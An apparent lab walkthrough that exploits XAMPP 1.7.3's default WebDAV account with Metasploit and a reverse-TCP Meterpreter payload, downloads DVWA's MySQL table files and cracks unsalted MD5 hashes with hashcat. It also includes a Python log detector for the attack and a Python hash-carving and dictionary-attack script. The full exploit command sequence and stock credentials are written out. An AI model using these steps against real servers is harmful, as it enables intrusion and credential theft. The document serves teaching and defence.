XAMPP 1.7.3 Exploitation


In this post I’m going to concentrate on exploiting an older version of XAMPP and then using that foothold to steal usernames and password hashes from the MySQL tables of a website hosted on it (DVWA). The tools used in this example are Metasploit’s msfconsole with a Meterpreter payload, and hashcat to crack the recovered hashes. The operating systems are Windows XP SP3 (firewall ON) for the victim and Kali Linux for the attacker.

XAMPP SETUP
On the victim’s machine, start all available server modules: Apache, MySQL, FileZilla and Mercury.

SCANNING THE VICTIM
The next step is to find out what software the victim runs, which we don’t know at the start. Open a terminal in Kali and run an Nmap version scan with the following command. In this case 192.168.1.7 is the victim’s IP address.

nmap -sV 192.168.1.7

When the scan returns, we can see which services the victim is running and the open ports they listen on, but it’s still not obvious what the server bundle is. The version string Nmap reports for port 80 is simply Apache’s Server header, and a quick Google search of that exact combination reveals that the victim is running XAMPP 1.7.3: that release bundled Apache 2.2.14, PHP 5.3.1, OpenSSL 0.9.8l and Perl 5.10.1 together, and the extra modules listed are XAMPP’s own choice. Note that this only works because XAMPP leaves the header verbose; an administrator who sets ServerTokens to Prod hides everything but “Apache”. The DAV/2 token is the detail that matters for the rest of this post: mod_dav is loaded, so the server speaks WebDAV.

Services Turned On (tokens of the Apache Server header on port 80)

Apache httpd 2.2.14

DAV/2

mod_ssl/2.2.14 OpenSSL/0.9.8l

mod_autoindex_color PHP/5.3.1

mod_apreq2-20090110/2.7.1

mod_perl/2.0.4 Perl/v5.10.1

XAMPP HACKING
Open another terminal window, fire up msfconsole, wait until it loads, and search the Metasploit module database for XAMPP.

msfconsole —starts msfconsole

search xampp —searches the module database for anything matching XAMPP


An exploit module shows up with a disclosure date of 14/01/2012. That is well after XAMPP 1.7.3 was released on 23/12/2009, so this version was never updated against it. Note what the module actually abuses: not a memory bug in Apache, but XAMPP’s default configuration. The /webdav/ directory is writable over WebDAV and protected only by a well-known stock account, so an authenticated PUT of a .php file followed by a GET of that file runs attacker-supplied PHP on the server. Turning DAV off or changing that account’s password is enough to stop this particular module.

use exploit/windows/http/xampp_webdav_upload_php

Now search for and choose an appropriate payload. In this example the payload opens a Meterpreter session, which lets the attacker browse, download and modify files and directories on the victim’s computer. Because it is a PHP payload it runs inside the Apache process, so it has exactly the privileges that process has, and it lacks some of the native Meterpreter features (process migration, for instance).

show payloads —shows all available payloads

set payload php/meterpreter/reverse_tcp —sets a particular payload


Now we need to look at the options that must be set for the exploit to run.

show options —shows required and non-required options to set up

We can see that some required options such as LHOST (local host, the attacker) and RHOST (remote host, the victim) are empty, while others are already filled with defaults: PATH (/webdav/), RPORT (80) and the USERNAME/PASSWORD pair the module authenticates with, which is XAMPP’s stock WebDAV account wampp/xampp.


set rhost 192.168.1.7 —sets the target address

set lhost 192.168.1.9 —sets the address the reverse connection comes back to (the attacker)

The exploit and the payload now have all the necessary information to conduct the attack.

exploit —attempts to exploit the target IP address

If the attack is successful, a Meterpreter command prompt will be displayed on screen.
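The blue-team counterpart to the steps above, as an added example that is not part of the original post: a small Python detector that runs over Apache access-log lines and flags the three things this exploit leaves behind, a request authenticated as XAMPP’s stock WebDAV account, a successful PUT of a server-executable file under /webdav/, and a later GET of that same file. The log lines are constructed for the example; the account name wampp and the /webdav/ prefix are taken from the module’s defaults and are an assumption about the target’s install.

```python
import re
from typing import Dict, List, NamedTuple

# Apache common log format: client ident user [time] "method path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Extensions a stock XAMPP Apache hands to an interpreter. A WebDAV PUT of one of
# these is a code-execution attempt, not a document upload.
EXEC_EXTENSIONS = (".php", ".php3", ".phtml", ".pl", ".cgi")

# Assumption: the stock account XAMPP enables for /webdav/ (the Metasploit module's
# USERNAME default). Any request authenticated as it is suspect on a real server.
DEFAULT_DAV_USERS = {"wampp"}

# Constructed log lines, not captured from the post's lab. They model the module's
# behaviour: an OPTIONS probe, an authenticated PUT of msf.php into /webdav/, and the
# GET that makes Apache execute it. The last line is a benign-looking PUT of a .txt.
SAMPLE_LOG = """\
192.168.1.9 - - [14/Jan/2012:10:00:01 +0000] "OPTIONS /webdav/ HTTP/1.1" 200 -
192.168.1.9 - wampp [14/Jan/2012:10:00:02 +0000] "PUT /webdav/msf.php HTTP/1.1" 201 -
192.168.1.9 - - [14/Jan/2012:10:00:03 +0000] "GET /webdav/msf.php HTTP/1.1" 200 1337
192.168.1.20 - - [14/Jan/2012:10:05:00 +0000] "GET /dvwa/login.php HTTP/1.1" 200 1238
192.168.1.21 - wampp [14/Jan/2012:10:07:00 +0000] "PUT /webdav/notes.txt HTTP/1.1" 201 -
"""


class Finding(NamedTuple):
    line: int
    kind: str
    client: str
    path: str


def analyse(log_text: str, dav_prefix: str = "/webdav/") -> List[Finding]:
    """Flag default-account use, executable uploads and upload-then-execute chains."""
    findings: List[Finding] = []
    uploaded: Dict[str, int] = {}  # path -> line of the successful PUT that created it
    for n, raw in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(raw)
        if not m:
            continue  # not common log format; skip rather than guess
        client, user, method = m["client"], m["user"], m["method"]
        path = m["path"].split("?", 1)[0]
        ok = 200 <= int(m["status"]) < 300
        if user in DEFAULT_DAV_USERS:
            findings.append(Finding(n, "default_webdav_account", client, path))
        # Only PUT is checked: MOVE/COPY name their target in the Destination header,
        # which the access log does not record.
        if (method == "PUT" and ok and path.startswith(dav_prefix)
                and path.lower().endswith(EXEC_EXTENSIONS)):
            findings.append(Finding(n, "webdav_executable_upload", client, path))
            uploaded[path] = n
        elif method == "GET" and ok and path in uploaded:
            findings.append(Finding(n, "uploaded_file_executed", client, path))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"line {f.line}: {f.kind} {f.client} {f.path}")
```

On the victim this would be run over C:\xampp\apache\logs\access.log (assumed to be XAMPP’s default log location). The “uploaded_file_executed” finding is the one worth paging on: a PUT alone may be a legitimate WebDAV user, but a PUT of a .php file that is then fetched is the module’s exact sequence.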


If the pwd (print working directory) command is executed you can see that the Meterpreter session has opened in C:\xampp\webdav, the directory the PHP payload was uploaded to. The database files of the target website are not located there, so we need to look for them under C:\xampp.

cd .. —moves to C:\xampp directory

ls —shows the content of C:\xampp directory


A directory named mysql is located in C:\xampp\, let’s see what’s inside.

cd mysql —moves to C:\xampp\mysql\

cd data —moves to C:\xampp\mysql\data\

cd dvwa —moves to C:\xampp\mysql\data\dvwa\

ls —shows the contents of C:\xampp\mysql\data\dvwa\

I already knew where the directory is; normally you would ls after every cd to view the contents.

The directory contains .MYD and .MYI files, the MyISAM data and index files for each table of the dvwa database, plus the .frm table definitions.


To download all the table files at once, move the session back up into the data directory, from where the whole dvwa directory can be downloaded onto the attacker’s machine.

cd .. —moves to C:\xampp\mysql\data\

download dvwa —recursively downloads the dvwa directory, which holds the table files


The whole source code of the website and any other file or directory the Apache process can read could be downloaded, modified or deleted in the same way, and new files uploaded, but that’s beyond the scope of this post.

PASSWORD CRACKING
The downloaded directory lands by default in /root/ on the attacker’s machine, Meterpreter’s local working directory. Open another terminal window and go to the downloaded dvwa directory. The usernames, hashed passwords and file paths to the users’ avatar pictures are in users.MYD.

cat users.MYD —shows the contents of the users.MYD file. It is a raw MyISAM data file, so there are some binary record bytes mixed in, but the text fields are stored as-is and are readable (strings users.MYD gives a cleaner view).


Extract the stolen hashes into a text file, one per line, and save it as stolenhashes.txt in the /root/ directory. DVWA stores passwords as unsalted MD5, which is why each hash is 32 hex characters and why hashcat mode 0 is used below.


The tool used to crack the hashes in this example is hashcat with the RockYou wordlist, here located in /root/Desktop (Kali ships it under /usr/share/wordlists/).

hashcat -m 0 -a 0 /root/stolenhashes.txt /root/Desktop/rockyou.txt —tries every word in rockyou.txt against the given hashes; -m 0 selects MD5 and -a 0 a straight (dictionary) attack.
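The hash extraction step and the cracking step, as one added example that is not part of the original post and does not reproduce hashcat itself: a Python script that carves username/MD5 pairs out of a raw users.MYD image by relying on the fact that MyISAM writes VARCHAR values as plain text with a one-byte length prefix, formats them in the user:hash layout hashcat’s --username option accepts, and then runs a straight dictionary attack over a constructed stand-in for rockyou.txt. The .MYD bytes and the wordlist are constructed here (the record header bytes are illustrative, not a byte-exact MyISAM layout); the accounts and default passwords are the ones DVWA’s stock database ships with.

```python
import hashlib
import re
from typing import Dict, List, Tuple


def md5hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def _row(first: str, last: str, user: str, password: str, avatar: str) -> bytes:
    """One constructed users row: MyISAM writes each VARCHAR as a length byte plus
    the text, so the values stay readable in the raw file. The three leading bytes
    stand in for the record header and are not a byte-exact MyISAM layout."""
    fields = [first, last, user, md5hex(password), avatar]
    out = b"\x03\x00\x00"
    for f in fields:
        out += bytes([len(f)]) + f.encode()
    return out


# Constructed stand-in for C:\xampp\mysql\data\dvwa\users.MYD, populated with the
# accounts and default passwords DVWA's stock database ships with.
SAMPLE_MYD = b"".join([
    _row("admin", "admin", "admin", "password", "hackable/users/admin.jpg"),
    _row("Gordon", "Brown", "gordonb", "abc123", "hackable/users/gordonb.jpg"),
    _row("Hack", "Me", "1337", "charley", "hackable/users/1337.jpg"),
    _row("Pablo", "Picasso", "pablo", "letmein", "hackable/users/pablo.jpg"),
    _row("Bob", "Smith", "smithy", "password", "hackable/users/smithy.jpg"),
])

# Constructed wordlist fragment standing in for /root/Desktop/rockyou.txt.
SAMPLE_WORDLIST = ["123456", "password", "abc123", "charley", "letmein", "qwerty"]

HASH_RE = re.compile(rb"[0-9a-f]{32}")          # unsalted MD5 as DVWA stores it
USER_RE = re.compile(rb"[A-Za-z0-9_]{1,32}$")   # alnum run ending right before the hash


def carve_credentials(myd: bytes) -> List[Tuple[str, str]]:
    """Return (user, md5) pairs. Relies on DVWA's column order: `user` is the text
    field immediately before `password`, separated only by the hash's length byte."""
    creds: List[Tuple[str, str]] = []
    for m in HASH_RE.finditer(myd):
        before = myd[:m.start() - 1]          # drop the 0x20 length byte of the hash
        u = USER_RE.search(before)
        if u:
            creds.append((u.group().decode(), m.group().decode()))
    return creds


def hashcat_input(creds: List[Tuple[str, str]]) -> str:
    """user:hash lines, the layout hashcat reads when run with --username."""
    return "".join(f"{u}:{h}\n" for u, h in creds)


def dictionary_attack(hashes: List[str], wordlist: List[str]) -> Dict[str, str]:
    """Straight attack, what `hashcat -m 0 -a 0` does: hash each candidate once and
    look it up against every target, stopping when all targets are recovered."""
    targets = set(hashes)
    cracked: Dict[str, str] = {}
    for word in wordlist:
        h = md5hex(word)
        if h in targets and h not in cracked:
            cracked[h] = word
            if len(cracked) == len(targets):
                break
    return cracked


if __name__ == "__main__":
    creds = carve_credentials(SAMPLE_MYD)
    print(hashcat_input(creds), end="")
    found = dictionary_attack([h for _, h in creds], SAMPLE_WORDLIST)
    for user, h in creds:
        print(f"{user}: {found.get(h, '<not cracked>')}")
```

Two things the script makes visible that the cat output does not: admin and smithy share a hash because unsalted MD5 maps equal passwords to equal hashes, so cracking one cracks both, and the attack cost is one MD5 per wordlist entry regardless of how many targets there are, which is why a few million rockyou entries take seconds.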


hashcat successfully cracked all of the hashes; DVWA’s default passwords are all in rockyou.txt, and unsalted MD5 offers no resistance to a dictionary attack. The attacker now tries to log in with a username and its corresponding cracked password.


SUCCESS!! The attacker now has complete control over the administrator account.

